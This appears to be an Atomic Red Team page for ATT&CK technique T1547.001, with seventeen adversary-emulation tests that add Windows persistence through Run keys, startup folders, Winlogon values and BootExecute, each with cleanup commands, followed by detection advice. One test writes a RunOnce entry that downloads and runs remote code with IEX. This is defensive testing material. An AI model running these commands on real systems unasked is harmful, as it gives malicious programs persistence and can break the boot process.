T1547.001 - Registry Run Keys / Startup Folder#
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the “run keys” in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account’s associated permissions level.
The following run keys are created by default on Windows systems:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a “Depend” key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d “C:\temp\evil[.]dll” (Citation: Oddvar Moe RunOnceEx Mar 2018)
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following Registry keys can be used to set startup folder items for persistence:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run automatically for the currently logged-on user.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
Atomic Tests#
Atomic Test #1 - Reg Key RunRun Key Persistence#
Upon successful execution, cmd.exe will modify the registry by adding “Atomic Red Team” to the Run key. Output will be via stdout.
Supported Platforms: windows#### Attack Commands: Run with command_prompt
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"
Invoke-AtomicTest T1547.001 -TestNumbers 1
Cleanup:#
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1
Invoke-AtomicTest T1547.001 -TestNumbers 1 -Cleanup
Atomic Test #2 - Reg Key RunOnceRunOnce Key Persistence.#
Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout.
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with command_prompt
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"
Invoke-AtomicTest T1547.001 -TestNumbers 2
Cleanup:#
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1
Invoke-AtomicTest T1547.001 -TestNumbers 2 -Cleanup
Atomic Test #3 - PowerShell Registry RunOnceRunOnce Key Persistence via PowerShell#
Upon successful execution, a new entry will be added to the runonce item in the registry.
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
Invoke-AtomicTest T1547.001 -TestNumbers 3
Cleanup:#
Remove-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce -Name "NextRun" -Force -ErrorAction Ignore
Invoke-AtomicTest T1547.001 -TestNumbers 3 -Cleanup
Atomic Test #4 - Suspicious vbs file run from startup Foldervbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, “T1547.001 Hello, World VBS!” will be displayed twice.#
Additionally, the new files can be viewed in the “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup”
folder and will also run when the computer is restarted and the user logs in.
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
Copy-Item "$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
Invoke-AtomicTest T1547.001 -TestNumbers 4
Cleanup:#
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
Invoke-AtomicTest T1547.001 -TestNumbers 4 -Cleanup
Atomic Test #5 - Suspicious jse file run from startup Folderjse files can be placed in and ran from the startup folder to maintain persistance.#
Upon execution, “T1547.001 Hello, World JSE!” will be displayed twice.
Additionally, the new files can be viewed in the “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup”
folder and will also run when the computer is restarted and the user logs in.
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
Copy-Item "$PathToAtomicsFolder\T1547.001\src\jsestartup.jse" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\jsestartup.jse" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
Invoke-AtomicTest T1547.001 -TestNumbers 5
Cleanup:#
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore
Invoke-AtomicTest T1547.001 -TestNumbers 5 -Cleanup
Atomic Test #6 - Suspicious bat file run from startup Folderbat files can be placed in and executed from the startup folder to maintain persistance#
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup”
folder and will also run when the computer is restarted and the user logs in.
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
Copy-Item "$PathToAtomicsFolder\T1547.001\src\batstartup.bat" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\batstartup.bat" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Invoke-AtomicTest T1547.001 -TestNumbers 6
Cleanup:#
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore
Invoke-AtomicTest T1547.001 -TestNumbers 6 -Cleanup
Atomic Test #7 - Add Executable Shortcut Link to User Startup FolderAdds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. Supported Platforms: windows#
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
$Target = "C:\Windows\System32\calc.exe"
$ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Create = $WScriptShell.CreateShortcut($ShortcutLocation)
$Create.TargetPath = $Target
$Create.Save() ```
Invoke-AtomicTest T1547.001 -TestNumbers 7
Cleanup:#
Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore```
Invoke-AtomicTest T1547.001 -TestNumbers 7 -Cleanup
Atomic Test #8 - Add persistance via Recycle binAdd a persistance via Recycle bin vxunderground#
User have to clic on the recycle bin to lauch the payload (here calc)
Supported Platforms: windows#### Attack Commands: Run with command_prompt
reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f```
Invoke-AtomicTest T1547.001 -TestNumbers 8
Cleanup:#
reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f```
Invoke-AtomicTest T1547.001 -TestNumbers 8 -Cleanup
Atomic Test #9 - SystemBC Malware-as-a-Service RegistryThis Atomic will create a registry key called socks5_powershell for persistance access#
https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
Supported Platforms: windows#### Attack Commands: Run with powershell
$RunKey = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File"
Invoke-AtomicTest T1547.001 -TestNumbers 9
Cleanup:#
Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name "socks5_powershell" -Force -ErrorAction Ignore
Invoke-AtomicTest T1547.001 -TestNumbers 9 -Cleanup
Atomic Test #10 - Change Startup Folder - HKLM Modify User Shell Folders Common Startup ValueThis test will modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V “Common Startup”#
value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
New-Item -ItemType Directory -path "$env:TMP\atomictest\"
Copy-Item -path "C:\Windows\System32\calc.exe" -destination "$env:TMP\atomictest\"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "$env:TMP\atomictest\"
Invoke-AtomicTest T1547.001 -TestNumbers 10
Cleanup:#
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"
Remove-Item "$env:TMP\atomictest\" -Recurse -Force
Invoke-AtomicTest T1547.001 -TestNumbers 10 -Cleanup
Atomic Test #11 - Change Startup Folder - HKCU Modify User Shell Folders Startup ValueThis test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V “Startup” value#
to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart
Supported Platforms: windows#### Attack Commands: Run with powershell
New-Item -ItemType Directory -path "$env:TMP\atomictest\"
Copy-Item -path "C:\Windows\System32\calc.exe" -destination "$env:TMP\atomictest\"
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:TMP\atomictest\"
Invoke-AtomicTest T1547.001 -TestNumbers 11
Cleanup:#
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
Remove-Item "$env:TMP\atomictest\" -Recurse -Force
Invoke-AtomicTest T1547.001 -TestNumbers 11 -Cleanup
Atomic Test #12 - HKCU - Policy Settings Explorer Run KeyThis test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot.#
*Requires reboot
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
New-Item -ItemType Key -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "atomictest" -Value "C:\Windows\System32\calc.exe"
Invoke-AtomicTest T1547.001 -TestNumbers 12
Cleanup:#
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "atomictest"```
Invoke-AtomicTest T1547.001 -TestNumbers 12 -Cleanup
Atomic Test #13 - HKLM - Policy Settings Explorer Run KeyThis test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run key value to launch calc.exe on boot.#
*Requires reboot
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
New-Item -ItemType Key -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "atomictest" -Value "C:\Windows\System32\calc.exe"
Invoke-AtomicTest T1547.001 -TestNumbers 13
Cleanup:#
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "atomictest"```
Invoke-AtomicTest T1547.001 -TestNumbers 13 -Cleanup
Atomic Test #14 - HKLM - Append Command to Winlogon Userinit KEY ValueThis test will append a command to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot.#
Requires reboot Supported Platforms: windows Elevation Required (e.g. root or admin)#### Attack Commands: Run with
powershell
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit-backup" -Value "$oldvalue";
$newvalue = $oldvalue + " C:\Windows\System32\calc.exe";
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$newvalue"
Invoke-AtomicTest T1547.001 -TestNumbers 14
Cleanup:#
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup');
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup'```
Invoke-AtomicTest T1547.001 -TestNumbers 14 -Cleanup
Atomic Test #15 - HKLM - Modify default System Shell - Winlogon Shell KEY Value This test change the default value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell from “explorer.exe” to the full path of “C:\Windows\explorer.exe”#
to log a change to the key’s default value without breaking boot sequence.
An atacker will alternatively replace this with a custom shell.
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell-backup" -Value "$oldvalue";
$newvalue = $oldvalue + ", C:\Windows\explorer.exe";
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$newvalue"
Invoke-AtomicTest T1547.001 -TestNumbers 15
Cleanup:#
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup');
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'```
Invoke-AtomicTest T1547.001 -TestNumbers 15 -Cleanup
Atomic Test #16 - secedit used to create a Run key in the HKLM Hivesecedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive.#
Reference
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with command_prompt
secedit /import /db mytemplate.db /cfg "$PathToAtomicsFolder\T1547.001\src\regtemplate.ini"
secedit /configure /db mytemplate.db
Invoke-AtomicTest T1547.001 -TestNumbers 16
Cleanup:#
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "calc" /f >nul 2>&1```
Invoke-AtomicTest T1547.001 -TestNumbers 16 -Cleanup
Atomic Test #17 - Modify BootExecute ValueThis test modifies the BootExecute registry value to “autocheck autoche *”, which can be used to simulate an adversary’s attempt to tamper with the system’s boot process.#
Reference - https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf
NOTE that by not saving the correct value, you may inhibit your system from booting properly. Only run on a test system. There is a reg export before running the Atomic.
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
if (!(Test-Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg")) { reg.exe export "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" /y }
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "BootExecute" -Value "autocheck autoche *" -Type MultiString
Invoke-AtomicTest T1547.001 -TestNumbers 17
Cleanup:#
reg.exe import "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"
Remove-Item -Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" -Force
Invoke-AtomicTest T1547.001 -TestNumbers 17 -Cleanup
Detection#
Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys’ Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.